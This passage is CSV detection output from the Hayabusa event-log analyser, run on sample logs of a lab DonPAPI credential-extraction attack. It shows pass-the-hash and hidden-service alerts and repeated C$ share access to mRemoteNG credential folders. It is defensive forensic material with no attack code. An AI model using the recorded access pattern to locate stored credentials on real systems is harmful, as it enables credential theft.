extraction.evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network 